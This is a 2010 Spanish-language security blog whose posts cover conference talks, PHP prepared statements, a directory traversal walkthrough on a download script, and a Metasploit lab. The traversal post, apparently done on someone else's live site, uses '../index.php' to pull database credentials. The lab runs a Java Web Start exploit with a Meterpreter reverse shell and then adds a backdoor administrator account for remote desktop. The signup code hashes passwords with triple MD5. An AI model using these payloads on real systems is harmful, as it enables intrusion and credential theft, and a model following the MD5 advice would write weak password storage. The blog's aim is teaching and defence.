M@gn0B4lt - Security - Hacking - Programming - Linux

Charla UNNE- RFI LFI & Directory transversal en Descarga de archivo

2010-09-19T18:32:00.000-07:00

El sabado 18/09, (ayer :)), los chicos de la Franja me invitaron a un evento que se realializo en la Unversidad de la UNNE, FaCENA, a las 9 hs, donde hubieron 2 charlas, una de Evaluación de Sistemas y otra mia que fue sobre Seguridad en PHP. Quiero agradecer a los chicos de la Franja (Chici, Carlitos, Aguntin ), por haberme dado la oportunidad de dictar una conferencia en la UNNE donde soy alumno, y donde si dios quiere termino este año Licenciatura.
Bien les paso algunas fotos y la presentación, donde no esta muchas cosas que mostre de codigo en php ya que no estraban en los slays, pero si algunas cosas importantes.

Presentacionblog

Fotos del Evento

con Bernardo, que hizo un video de LFI por metodo POST

Asado en lo de Padilla, y Yamila cocinando naaaa jajajaja

Saludos

Prepared Statements PHP y MySQL- Alta usuario

2010-08-23T19:50:00.000-07:00

Anduve probando unas cosas en PHP, en estos dias que estaba mas libre con la facultad, y me decidi crear un alta de usuario, donde haya una seguridad relativamente alta.
Primero que nada use lo que se llama como Prepared Statements, que nos permite realizar una consulta al DBMS, pudiendo por asi decirlo, separar lo que ingresa el usuario del codigo mismo, es decir que el motor sabe que valor es ingresado por el usuario, con la ventaja pricipal en seguridad de que no pueden inyectar codigo arbitrario en la consulta conocido como SQL INJECTIO

Coloquemos un ejemplo de lo que seria una consulta con Prepared Statements, un consulta a un articulo de una noticia.


$mysqli = new mysqli('host', 'user', 'pass', 'db');
$stmt=$mysqli->prepare("SELECT * FROM NOTICIAS WHERE ID=?");
$stmt->bind_param('i', $_GET['id']);
$stmt->execute();

En la primer linea creamos el un objeto mysqli, en la segunda preparamos la consulta para enviar al motor, note que el valor que se espera se coloca con el caracter ?, tercera linea agrega la variable a la sentencia preparada, fijese que está el valor i, lo cual significa que lo que se espera será un entero. Tambien podemos usar s (string), d (double), b (binary data) dependiendo lo que se necesita.
En la cuarta linea ejecutamos el Statement Prepared. :)
En la sección de Prevencion de SQL INJECTION de la OWASP, lo tenemos como primer medida de seguridad. Lo bueno de esto es que el codigo no queda tan sucio, al filtrar todas las entradas del usuario con funciones como int(), settype(), is_numeric(), mysql_real_escape_string() etc.

El alta creado tiene las siguientes caracteristicas: La contraseña se encripta 3 veces en md5 (lo cual se puede cambiar desde el codigo), debe ser mayor a 7 caracteres, y debe contener al menos una mayuscula y un numero.
Este es el codigo con el formulario en HTML y el PHP.


<html>

Alta Usuario

<form action='' method='post'>
<br>
Nombre:
<br>
<input type='text' name='nombre'>
<br>
Email
<br>
<input type='text' name='email'>
<br>
Usuario:
<br>
<input type='text' name='user'>
<br>
Contraseña:
<br>
<input type='password' name='pass'>
<br>
<input type='submit' value='Enviar' name='enviar'>
</form>

function pass_cript($pass){
for($i=0;$i <3;$i++){ pass="md5($pass);" stmt=" $mysqli">prepare("SELECT usuario FROM usuarios WHERE usuario=?");
$stmt->bind_param('s', $usuario);
$stmt->execute();
$stmt->bind_result($result);
#tercer if
if($stmt->fetch()== false)
{
verificar_pass();
}
else {
echo "El usuario ya existe";
}
}

function alta(){

global $mysqli;
global $usuario;
global $password;
global $email;
global $nombre;
$password=pass_cript($password);
$stmt=$mysqli->prepare("INSERT INTO usuarios (usuario, password, Email, Nombre) VALUES (?, ?, ?, ?)");
// Bind your variables to replace the ?s
$stmt->bind_param('ssss', $usuario, $password, $email, $nombre);
  // Execute query
$stmt->execute();
printf("%d Fila Insertada.\n", $stmt->affected_rows);
// Close statement object
$stmt->close();
echo "El usuario ".$usuario." ha sido dado de alta!!";
}

function verificar_pass(){
global $password;

if(strlen($password) > 7 )
{
   if (preg_match('/[A-Z]+[0-9]+/', $password) || preg_match('/[0-9]+[A-Z]+/', $password))
{
alta();
}
else
{
echo "El password debe estar constituido por al menos una mayuscula y al menos un digito";
exit;
}
}
else
{
echo "El password debe ser mayor a 7 caracteres";

}
}




#Prepared Statements
$mysqli = new mysqli('host', 'user', 'pass', 'db');
if (mysqli_connect_errno())
{
printf("Can't connect to   MySQL Server. Errorcode: %s\n", mysqli_connect_error());
exit;
}
#Primer if
if(!empty($_POST['enviar']))
{
#segundo if
if (isset($_POST['nombre']) && !empty($_POST['nombre']) && isset($_POST['email']) && !empty($_POST['email']) && isset($_POST['user']) && !empty($_POST['user']) && isset($_POST['pass']) && !empty($_POST['pass']))
{

$nombre=$_POST['nombre'];
$usuario=$_POST['user'];
$password=$_POST['pass'];
$email=$_POST['email'];
verificar_usuario();

}#cierre segundo if
else
{
echo "Debe rellenar los camposs gracias";
}
}#cierro primer if

?>

Voy a explicar lo que hace el codigo, osea su secuencia para que se entienda y luego los que quieren usarlo lo usen para sus
altas XD o para probar.
En la linea 105 es donde verifico que todos los datos del formulario esten definidos y que no esten en blanco, en caso afirmativo
tomo esos valores y voy a la función verificar_usuario().
Esta función lo que hace es verificar si el usuario que se quiere dar de alta existe en la base de datos,
en caso de que llegara a existir imprimira una leyenda con "El usuario ya existe", y se terminaria el proceso. En caso negativo se
se dirige a la función verificar_pass().
Esta función realiza el testeo de seguridad del password donde debe cumplir que: debe ser mayor a 7 caracteres y
debe contener al menos una mayuscula y un numero en el.
Cumpliendo estas restricciones en el password se dirige a la función alta(), que en la linea 57,
el valor de $password es pasado a a la función pass_cript(), para encriptarlo en una cantidad de 3 veces en MD5, luego basicamente
se realiza el INSERT INTO correspondiente al alta :).

Aca les dejo algunos enlaces para que sigan leyendo sobre Prepared Statemen

http://mattbango.com/notebook/web-development/prepared-statements-in-php-and-mysqli/
http://www.ultramegatech.com/blog/2009/07/using-mysql-prepared-statements-in-php/
http://www.hiteshagrawal.com/mysql/mysql-prepared-statement-in-php

Saludos

JOINEA 2010

2010-08-18T11:28:00.000-07:00

Bueno despues de mas de un mes sin postear, por motivos de la facultad y otras cosas vuelvo.

Este fin de semana se viene la JOINEA - Jornade de Integración, Extensión y Actualización de Estudiantes de Sistemas - el cual se realiza en Apostoles Misiones organizado por los chicos de la UNaM.
Hubo un llamado de papers, envie uno y quedo seleccionado, sobre Segridad Web: SQL injection y Directory Transversal, pero por motivos de tiempo en la expocicion lo reduje solamente a SQL Injection ya que se haria interminable.
Hay buen nivel de las expociciones, asi que seguro voy a ir a aprender mucho y conocer gente nueva el cual son los objetivos principales. Aqui les dejo el cronograma del evento.
Mañana a las 12 salimos de la Costanera, ya que el centro de estudiantes de la FA.CE.NA organizo el viaje para cualquiera a un costo accesible que incluye viaje, hospedaje y comida, en donde se lleno un colectivo con capacidad para 45 personas.
Aqui les dejo mi presentacion,

SQL Injection Joinea 2010

Saludos

Directory Transversal en descarga de Archivo

2010-06-21T19:49:00.000-07:00

Me encontre con una web la cual nesesitaba descargar un fichero que me resultaba de interes, donde la direccion de descarga era similar a esto:
http://www.sitio.com/descarga/download.php?file=archivo.extension, por lo que me propuse verificar si dicho downloader tenia alguna validación, para provocar un Directory Transversal.
Lo que realize fue la peticion de este modo http://www.sitio.com/descarga/download.php?file=download.php, para descargarme el archivo download.php
y heureca :)

Al abrir el archivo download.php podemos empezar a verificar las fallas de la validaciones:


$filename = $_GET['file'];

// addition by Jorg Weske
$file_extension = strtolower(substr(strrchr($filename,"."),1));

if ( ! file_exists( $filename ) )
{
 echo "not file";
 exit;
};
switch( $file_extension )
{
 case "pdf": $ctype="application/pdf"; break;
 case "exe": $ctype="application/octet-stream"; break;
 case "zip": $ctype="application/zip"; break;
 case "doc": $ctype="application/msword"; break;
 case "xls": $ctype="application/vnd.ms-excel"; break;
 case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
 case "gif": $ctype="image/gif"; break;
 case "png": $ctype="image/png"; break;
 case "jpeg":
 case "jpg": $ctype="image/jpg"; break;
 default: $ctype="application/force-download";

header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");


?>

en la primera linea, podemos ver que toma el nombre del archivo por la variable $_GET['file'] y lo guarda en $filename, luego en la linea 4 lo que hace esta funcion es tomar todo el nombre del archivo y solo obtener su extension por ejemplo, si el archivo a descargar es archivo.pdf la variable $file_extension va a contener pdf, aca fue lo que me parecio algo muy bueno cuando estaba leyendo el codigo, pero solo lo usa para colocar el tipo de MIME(linea 12), lo cual esta muy bien pero tambien ubiera filtrado con ellos una black-list para que no se pueda descargar entensiones peligrosas.
En la linea 31 mostramos el nombre del archivo que le aparecera al usuario cuadno descarga y en la linea 33 el Content-Lenght es el tamaño del archivo, ah y la linea 29 es el MIME del que hablamos anteriormente. :)
Como la descarga se realizo con un php podemos llegar a pensar que podemos descargar cualquier php de la web, entonces buscaremos descargar el index que es donde puede haber datos interesantes de conexion de base de datos :)

http://www.sitio.com/descarga/download.php?file=../index.php

Al abrir el archivo index.php vemos esta informacion un poco mas interesante que la anterior

Nos descargamos el archivo class_DB.php, y dentro de ese archivo vemos una linea mucho mas interesante


include("conectar.php");

Y como piensan que sigue esto? ........... Si correcto, nos descargamos el archivo conectar.php

Bien ahora queda buscar el phpmyadmin, colocando www.sitio.com/phpmyadmin de la forma facil, y si no encontramos ahi podemos largar algun bruteador. O tambien que es la que mas me gusta por el cliente de mysql, primero comprobamos si el puerto esta abierto hacia el publico con Nmap :)

y ahora nos conectamos

Creo que queda entendida la peligrosidad de lo que se expone a no validar estas entradas asi como todas las entradas que se le da al usuario, siempre hay que verificarlas. Desde una simple bajada de archivo pudimos ingresar a sus datos, romper la confidencialidad de ellos, podriamos romper su integridad y hasta la disponibilidad de su sitio Web.

Para completar, al mismo script, le coloque seguridad, para que no se pueda descargar alguna extension peligrosa como php, asp, inc, etc. y para que no se pueda escalar directorios.


$index="http://".$_SERVER['SERVER_NAME']."/index.php";
$filename = basename($_GET['file']);
$ruta="descargas/".$filename;
// addition by Jorg Weske
$file_extension = strtolower(substr(strrchr($filename,"."),1));
#------------Bloque Seguridad ------------------
if(preg_match('/(php|asp|ini|inc|bak)/',$file_extension)){
   header("Location:".$index);
}

elseif( $filename == "" ) 
{
   header("Location:".$index);
}
elseif( ! file_exists( $ruta ) ) 
{
   header("Location:".$index);
};

#-----------Fin Bloque Seguridad--------------
switch($file_extension )
{
  case "pdf": $ctype="application/pdf"; break;
  case "exe": $ctype="application/octet-stream"; break;
  case "zip": $ctype="application/zip"; break;
  case "doc": $ctype="application/msword"; break;
  case "xls": $ctype="application/vnd.ms-excel"; break;
  case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
  case "gif": $ctype="image/gif"; break;
  case "png": $ctype="image/png"; break;
  case "jpeg":
  case "jpg": $ctype="image/jpg"; break;
  default: $ctype="application/force-download";
}

header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers 
header("Content-Type: $ctype");
header("Content-Disposition: attachment; filename=\"".$filename."\";" );#nombre del archivo en la descarga
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($ruta));
readfile("$ruta");



?>

La segunda linea usamos la funciona basename, que logra que si el usuario coloca por ejemplo /carpeta/carpeta2/archivo.pdf, nos devilvera archivo.pdf, eliminado toda la ruta anterior y con la ayuda de la linea 3 ponemos una carpeta llamada descargas, la cual en ella contendra todos los archivos para descargas (valga la redundancia), y donde el usuario nunca podra escaparse de ella.
Asi por ejemplo si el usuario intenta descargar de esta forma
www.sitio.com.ar/download.php?file=/etc/passwd la variable $filename quedara con el valor passwd, y concatenando con la carpeta descargas la variable $ruta contendra descargas/passwd
En el bloque de seguridad, la primer linea verifica con una expresion regular que si existe esas extensiones, te direcciones al index (se puede colocar tantas como guste en esa lista).

Eso es todo

Saludos

Seguridad en Apache

2010-06-16T11:09:00.000-07:00

Bueno hace mucho que no andaba haciendo nada por el blog, por motivos de la facultad y otras cuestiones personales :).
Tengo que dar una clase en la Facultad Fa.C.E.N.A, en la catedra Redes de Altas Prestaciones en la cual soy adscripto, y como tema elegi Apache.

Bueno la documentación en si no esta muy avanzada ya que seria mas que nada una introduccion a lo que es apache y como configurarlo apuntando a la seguridad en un nivel intermedio, por motivos de que solamente lo doy en una sola expocición y hay alumnos que nunca instalarón Apache, ni mucho menos tocaron Linux asi que uno de mis objetivos es que se codeen con Debian y obviamte configurar Apache que es el eje de la clase.
Tambien trabajo con Lampp, por cuestiones de que esta catedra esta en el ultimo año y ya estamos todos con el tema de la Tesis, y algunos estan tirando hacia PHP, y este paquete nos trae todo empaquetado MySQL, PHP y Apache, aunque lo mejor hubiera sido compilarlo a Apache desde 0 descargando de la pagina oficial.
Bueno la información que elegi creo que esta buena para empezar a toquetear las funcionalidades basicas y no tan basicas de Apache, les dejo mas abajo el material.

Apache

Saludos a todos y Feliz Dia del Padre :)

Laboratorio Metasploit java Web Start + Escritorio Remoto Getgui

2010-05-12T19:43:00.000-07:00

Otro mas laboratorio sobre Metasploit. Creo que este es uno de los exploit mas peligrosos con respecto a los anteriores que mostre, ya que lo estube probando y no llega a ser detectado por los AV.
La falla reside en el Web Start de Java, el binario llamada javaws.exe, el problema es que la validacion de URL es minima por lo cual se puede realizar una inyeccion de codigo arbitrarios.
Esta falla fueron descubiertas paralelamente por Tavis Ormandy y Ruben Santamarta

la línea de comandos "-XXaltjvm "y curiosamente también "-J-XXaltjvm "(vea el interruptor -J en javaws.exe). Esto indica a Java que cargue una bibliotec JavaVM alternativa (jvm.dll o libjvm.so) desde la ruta deseada. Fin del juego. Podemos establecer-XXaltjvm = \ \ IP\maligno, de esta manera javaw.exe cargará nuestra jvm.dll maligna. Adios ASLR, DEP .. . ", dijo Santamarta en su comunicado.

Un buen documento explicado sobre la falla es en este link

Para que funcione este exploit desde Metasploit Framework, tenemos que estar en una maquina como root y no tener ningun servidor SMB corriendo, el otro requerimiento es que en la maquina victima tiene que estar el WebClient prendido. La forma de verificar si esta corriendo el servicio es

C:\>sc query webclient | find "STATE"
STATE              : 4  RUNNING

Prueba Metasploit

Para demostrar la falla utulizaremos el popular metasploit, y el exploit cargado llamado java_ws_arginject_altjvm. Abajo se muestra toda la secuencia de comandos para cargar el exploit mas el payloads, cosas ya viste anteriormente en los anteriores publicaciones sobre metasploit :)


#msfconsole
            _       _
_                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
      |_|


=[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 320 exploits - 99 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
=[ svn r9306 updated today (2010.05.15)

msf > use exploit/windows/browser/java_ws_arginject_altjvm
msf exploit(java_ws_arginject_altjvm) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(java_ws_arginject_altjvm) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(java_ws_arginject_altjvm) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(java_ws_arginject_altjvm) > set LPORT 3333
LPORT => 3333
msf exploit(java_ws_arginject_altjvm) >
[*] Started reverse handler on 192.168.56.1:3333
[*] Using URL: http://192.168.56.1:80/
[*] Server started.

Ahora solo queda que la victima ingrese a nuestro servidor iniciado por el MSF con la pagina HTML maligna.

La maquina Virtual es un XP SP 3 y la Version de Java es:

C:\Documents and Settings\victima 2>java -version
java version "1.6.0_18"
Java(TM) SE Runtime Environment (build 1.6.0_18-b07)
Java HotSpot(TM) Client VM (build 16.0-b13, mixed mode, sharing)

Se aconseja actualizar Java a una version mas reciente, a partir de la 1.6.0_20, es donde se encuentra el parche, ya que es es considerada de criticidad maxima a esta vulnerabilidad.
De todos los exploit que he probado sobre browser hasta el momento, este es uno de los mas peligrosos, ya que es independiente del browser, y los AV hasta el momento ( por lo que eh notado ), no tienen alguna firma, aunque me paresca raro..

ESCRITORIO REMOTO

Cuando obtenemos una session de meterpreter, tenemos muchas funcionalidades, como migrarnos de procesos, keyloger, screenshot, capturar las llaves, etc.
La opcion que vamos a ver, es un script que permite abrir un Terminal Server en la maquina victima, pero para que nosotros podamos usarlos sin algun problema tendremos que modificar el codigo para que coloque un usuario en el grupo Administradores en las version español de windows.

El script se llama GETGUI, para modificar nos vamos a donde estan los archivos de script en mi caso:

/opt/metasploit3/msf3/scripts/meterpreter

En esta ruta estan lo script del meterpreter.

Como veran, el getgui nos da algunas opciones donde una de ellas es el lenguaje, con el parametro -l le pasamos el tipo pero solo hay en Ingles y Aleman.


meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u  -p 
Or:    getgui -e

OPTIONS:

-e        Enable RDP only.
-f   Forward RDP Connection.
-h        Help menu.
-l   The language switch
 Possible Options: 'de_DE', 'en_EN' / default is: 'en_EN'
-p   The Password of the user to add.
-u   The Username of the user to add.

Lo que haremos es editar el archivo getgui.rb

#nano /opt/metasploit3/msf3/scripts/meterpreter/getgui.rb

Nos dirijimos a la linea 113, y cambiamos este trozo de codigo

case lang
when "en_EN"
rdu = "Remote Desktop Users"
admin = "Administrators"
when "de_DE"
rdu = "Remotedesktopbenutzer"
admin = "Administratoren"

end

Por este otro


case lang
when "en_EN"
rdu = "Remote Desktop Users"
admin = "Administrators"
when "de_DE"
rdu = "Remotedesktopbenutzer"
admin = "Administratoren"
when "es_ES"
         rdu = "Usuarios de escritorio remoto"
         admin = "Administradores"


end

Una vez que hayamos cambiado, ahora nos vamos al nuestra sessions del meterpreter y ejecutamos.



meterpreter > run getgui -u hacker -p 123456 -l es_ES
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Language set by user to: 'es_ES'
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: hacker with Password: 123456
[*]     Adding User: hacker to local group 'Usuarios de escritorio remoto'
[*]     Adding User: hacker to local group 'Administradores'
[*] You can now login with the created user

Lo que hace esto es crear un usuario hacker con password 123456 al grupo "Administradores" y que pueda accederse atravez de escritorio remoto dicho usuario "Usuarios de Escritorios remoto".
Ahora para ver si todo funciona, vamos a una shell y con el programa rdesktop nos conectamos. ( Si no lo tenes y estas en debian o distros similares aptitude install rdesktop ).

$rdesktop 192.168.56.101

Eso es todo, Saludos

REFERENCIAS

http://blog.metasploit.com/2010/04/java-web-start-argument-injection.html
http://seclists.org/fulldisclosure/2010/Apr/119
http://www.pentester.es/2010/05/explotando-java-web-start.html
http://www.pentester.es/2010/05/vulnerabilidad-en-java-web-start.html
http://threatpost.com/es_la/blogs/nueva-falla-en-java-afecta-todas-la-versiones-de-windows-040910

Sintesis Primer Seminario de Seguridad en Formoss

2010-05-12T08:41:00.001-07:00

Bien el sabado 8 del corrientes mes, Del Prado me busca a las 5 de la mañana para partir, con Sergio Lobera y Gerardo Faifer. Primer parada a Rcia. a buscarlo a Cacivio a su casa y a Marina, hicimos unos mates descargamos al auto 2 de las nuevas DELL que compro Cacivio para INSTEL, y emprendimos a Formosa. Llegamos para las 8 de la mañana con ayuda de GPS de Prado.
Bueno el cronograma se fue dando diferente quedando de esta manera.

Peligro en Internet - Metasploi Framework y el uso de Backdoor. (Expositor: Juan Francisco Bosco)
Phishing - Robo y utilización de información. (Expositor: Sergio Lobera)

12:00hs. INTERMEDIO - Con asado en una parillada ;)

Robo de Identidad y Seguridad de los Datos (Expositor: Pedro Matías Cacivio)
Analisis Forense (Expositor: Sebastián del Prado)
El Uso de PHP por los Hackers (Expositor: Alejandro Zapiola)

Por recalcar la organizacion estubo muy buena, los chicos de MicroNET estuvieron muy eficiente en ese aspecto, desde cafe, chipacitos, un salon muy amplio, acreditaciones ETC. Esperamos volver con INSTEL mas adelante y realizar otro seminario.
Aca van algunas fotos!

En mi Exposicion

Los Chicos de MicroNET

ACA HAY MAS FOTOS DEL EVENTO QUE YA ESTAN SUBIDAS ;)

SALUDOS

1er Seminario de Seguridad Informatica - Formosa 2010

2010-05-04T21:15:00.000-07:00

Este sábado 8 de mayo viajamos a Formosa con el grupo de Instel a realizar un seminario de Seguridad como el titulo lo dice. Nos vamos muy entusismados ya que nos encanta realizar estos eventos, y de paso conocer ciudades de la Argentina que es Hermosa y no tiene a ningun pais que envidiar.
Como siempre en estos eventos se conoce gente nueva, si tenes suerte un buen amigo y se aprende una cantidad. Sin mas nada que decir les dejo mas abajo los temas que se daran y los que esten cerca puedan ir, va a estar bueno, hay mucho contenido relacionado entre las charlas.
Gente nos vemos por Formosa Capital, el salón donde se realiza el evento es en "Salón de Actos Vialidad Provincial". Mas información AQUÍ

8:00hs. ACREDITACIONES

8:30hs. Robo de Identidad y Seguridad de los Datos (Expositor: Pedro Matías Cacivio)

Hoy en día sin darnos cuenta dejamos mucha información en Internet “contraseñas, teléfonos, e-mail, direcciones, fotos, etcétera, en distintas bases de datos, siempre pensando que se mantendrá nuestra privacidad. ¿Qué pasa cuando un atacante experimentado accede a toda nuestra información?

En esta charla se verá como se puede violar completamente la seguridad de estas bases haciéndonos con toda la información. La cual puede ser utilizada en nuestra contra, estando el atacante completamente invisible en la red, delinquiendo sin dejar rastros y sin posibilidad de ser atrapado.

10:00hs. Phishing - Robo y utilización de información. (Expositor: Sergio Lobera)

Se demostrará cómo una persona, puede por medio de ingeniería social, recolectar datos vitales para la suplantación de identidad, robo de cuentas y utilización de las mismas.

Se enseñarán formas detección de los mismos, protección y posterior denuncia (blacklist) de sitios y dominios phishers.

Por último se verá un ataque por medio de phishing con el que se obtienen múltiples contraseñas de cuentas de todo tipo (Rapidshare, Facebook, Paypal, etc).

12:00hs. INTERMEDIO

13:30hs. Peligro en Internet - Metasploi Framework y el uso de Backdoor. (Expositor: Juan Francisco Bosco)

Se mostrará como un atacante, explota fallas de seguridad usando la internet como medio para acceder a computadoras personales, comprometiéndolas en su totalidad, así como los datos que se encuentran en la misma, para ellos se valdrá de una herramienta libre Metasploit Framework y bug de los sistemas operativos. También se mostrara como crear backdoor y el uso de Cripter para bypasear firmas de los Avs, comprometiendo en forma invisible a sus víctimas.

15:00hs. El Uso de PHP por los Hackers (Expositor: Alejandro Zapiola)

En esta charla se hará hincapié en la forma que los ciberterroristas usan el PHP para la creación de herramientas, robo de cookies, fallas XSS, y errores programación en PHP, explotándolas para luego apoderarse de la identidad de su víctima, luego veremos cómo solventar dichas fallas.

16:00hs. Sistema de detección de Intruso IDS (Expositor: Sebastián del Prado)

Se disertará sobre la correcta instalación, configuración, y planificación de reglas de seguridad, usando un IDS libre Snort, también se verá el manejo de sniffer, Oink Master (actualizado de reglas). Instalación de IPCOP (distribución Linux de seguridad que tiene SNort como motor principal) en una interfase amena, manejo de IPTABLES, manejos de Ambientes (Verde, Azul, Naranja “topologías de instalación”), Se mostrará Videos con ejemplos de ataques reales y como se visualizan, etc.

18:00hs. CIERRE. Entrega de Certificados.

Jugando con Festival

2010-04-26T18:22:00.000-07:00

Buenas hace un tiempo habia visto un post sobre este tema en el blog de Zerial.
La cuestion es que siempre quise jugar con esto pero por A o por B nunca lo hice, pero en fin ayer me quede hasta tarde entretenido con festival y me codee algo en perl para traer datos desde la web.

¿Pero que es Festival? Festival es un software text-to-speech (TTS) o sintetizador de vóz que nos permite lograr que nuestra máquina nos hable o, más bien, nos lea algún texto. Mas informacion aqui

Estracto Blog de Zerial

Para instalar este paquete no logueamos como r00t en la shell y lo instalamos con aptitude

$su
#aptitude install festival
#aptitude install festlex-cmu festlex-poslex festvox-kallpc16k libestools1.2 festvox-ellpc11k

Para probar que funciona correctamente, nos logueamos como usuario normal y colocamos.

$ festival --language spanish
Festival Speech Synthesis System 1.96:beta July 2004
Copyright (C) University of Edinburgh, 1996-2004. All rights reserved.
For details type `(festival_warranty)'
festival> (SayText "holaa como estas")

Si oyen el "Hola Como estas", es una voz horrible robotica pero bueno es lo que hay xD. Tambien se le puede pasar un archivo de texto para que lo lea. Tengo un amigo que uso uno de estos programas en windows y se leyo todo el libro de Kevin Mitnick "El arte de la intrusion" xD. Para leer un archivo se pasa este parametro.

$festival --language spanish --tts archivo.txt

Acoplando con Perl

Me escribi un simple script en perl donde trae el pronostico de Corrientes Capital, y empieza a recolectar datos que quiero con expresiones regulares, tambien nos dice la hora y algunas cosas mas. Esta maso por que lo hice a la madrugada y tenia pensado seguir agregandole mas cosas pero ya se hacia muy tarde, en fin se les dejo el script.
Esta muy entretenido podemos hacer muchas cosas como por ejemplo que nos lea noticias importantes, horoscopos, estado del transito etc. Yo lo coloque que cuando arranque el sistema me cuente como esta el pronostico ( ya me esta por cansar igual ja ).
Ah la pagina donde saca el pronostico es esta

who-speak.pl


#!/usr/bin/perl

use LWP::Simple;

use utf8 ;

no utf8 ;

$pag="http://www.weather.com/weather/today/Corrientes+Argentina+ARCS0025";

$ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (X11; U; Linux x86_64; es; rv:1.9.1.8) Gecko/20100218 Firefox/3.0.3 (like Firefox/3.5.8)');

  $ua->default_header('Accept-Language' => "es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3");#acceptar lenguage español

        $ua->timeout(7);

        #$ua->env_proxy;

        $response = $ua->get($pag);

  $pedido= $response->content;



#$pedido =~m/<p align=center><b>HOY(.*?)<\/b><\/p>/s;

#$dia=$1;

#--------------------------Tomo fecha actualizacion de datos--------------------------------------------s#

#

$pedido =~m/<p class="ccWeatherTimeStamp">Updated:\s*(.*?)Local Time<\/p>/s;#tomo la actulizacion de los datos

$update=$1;

$update=~s/\n//gi;$update=~s/\t//gi;#limpio los \n y los \t

#----------Cambio los meses a Español------------

$update=~s/Jan/Enero/gi;

$update=~s/Feb/Febreol/gi;

$update=~s/Mar/Marzol/gi;

$update=~s/Apr/Abril/gi;

$update=~s/May/Mayo/gi;

$update=~s/June/Junio/gi;

$update=~s/July/Julio/gi;

$update=~s/Aug/Agosto/gi;

$update=~s/Sept/Septiembre/gi;

$update=~s/Oct/Octubre/gi;

$update=~s/Nov/Noviembre/gi;

$update=~s/Dec/Diciembre/gi;

#-----------------Fin CAmbio Meses---------------------





#--------tomo la temperatura-----------



$pedido =~m/<div class="ccTemp">(\d+)° F<\/div>/s;

$temp=$1;

$centigrados=($temp - 32) * 5/9;#paso de F a C

$centigrados = sprintf("%.1f", $centigrados);#truncoo el numero

#-------------tomo el estado---------------

$pedido =~m/<div class="ccdata"><p>(.*?)<\/p><\/div>/s;

$estado=$1;





#--------------------------creo el archivoi--------------------------------------------s#

($sec,$min,$hour)= localtime(time);



open (AR,">"."temp.txt") || die "No puede crear el archivo error: $!";

print AR "Hola Francisco, BUEN DIA!!\n";

print AR "Son las $hour horas, con $min minutos, y $sec segundos.\n";

print AR "Estado Del Tiempo. -- Corrientes Argentina --.\n";

print AR "Ultima Actualizacion del Pronostico ".$update.".\n";

print AR "En este momento, la temperatura es de: ".$centigrados." Centigrados.\n";

print AR "con un estado del tiempo ".$estado."\n";

close(AR);

system('festival --language spanish --tts temp.txt');

Eso es todo..

Saludos

SQL injection Parte I

2010-04-18T16:58:00.001-07:00

Sin lugar a dudas esta tecnica es una de las mas peligrosas que hay en una aplicacion, ya sea WEB o de Escritorio, por la potencia que tiene y la capacidad de poder ingresar a un sistema de una forma eficaz. Por practica puedo decir que es vulnerabilidad que mas me gusta testear, ya que tiene muchas posibilidades de ataque. Decidi crear post sobre este tema dividas en partes, esta sera la primer entrega :).
Vamos a ver desde el pricipio y para que lo practiquen en forma local, asi que nesesitaremos un paquete llamado LAMPP para trabajar en entornos Linux ( tambien lo pueden hacer desde W$ ), que nos trae empaquetado APACHE, PHP, MYSQL y FTP.

¿Que es SQL Injection?
Es la Tecnica que permite introducir comandos SQL arbitrarios en una consulta que esta establecida en la aplicacion, la cual las variables que piden al usuario no pasan por algun filtro, pudiendo este introducir comandos SQL que luego seran interpretados por el DBMS.
Dependiendo el motor se inyecta de una forma u otra, este tutorial va a estar basado en MySQL con PHP.

Requisitos:

Descargar Lammpp Ultima Version
Conocimientos en PHP y MySQL
Conocimientos de phpMyAdmin

Comenzando

1)Instalando lampp

Como dije anteriormente, el tutorial enseñara hasta como instalar el lampp, de forma básica podría encontrar mas datos sobre el, en su pagina principal.
Cuando tengamos el archivo de lampp que en este caso seria este xampp-linux-1.7.3a.tar.gz, para instalarlo tiene una forma super fácil, nos logueamos como r00t y colocamos en la consola

#tar xvfz xampp-linux-1.7.3a.tar.gz -C /opt

Esto creara una carpeta llamada lampp, en el directorio /opt. Por lo tanto todos los archivos, binarios, conflagraciones, bases de datos, etc estarán en el /opt/lampp.
Podemos ir posicionandonos en ella e ir familiarizandonos,

#cd /opt/lampp; ls -la

La conflagración del Lampp por ahora la vamos a dejar como default, para poder hacer inyecciones copadas sobre MySQL. Lo que si vamos a cambiar es el DocumentRoot
de apache, que es la raíz lógica de donde apache empieza a leer los documentos, para ellos tenemos que editar el archivo httpd.conf de Apache

#cd /opt/lampp/etc
Realizamos un backups antes de realizar cambios en archivos de configuraciones de cualquier tipo.
#cp httpd.conf httpd.conf.backup
#nano httpd.conf

Yo uso nano uds podrian usar VI o el que quisieran, buscamos la linea donde dice

DocumentRoot "/opt/lampp/htdocs"

Y cambiamos a una carpeta en nuestro home, osea en mi caso

DocumentRoot "/home/magnobalt/www"

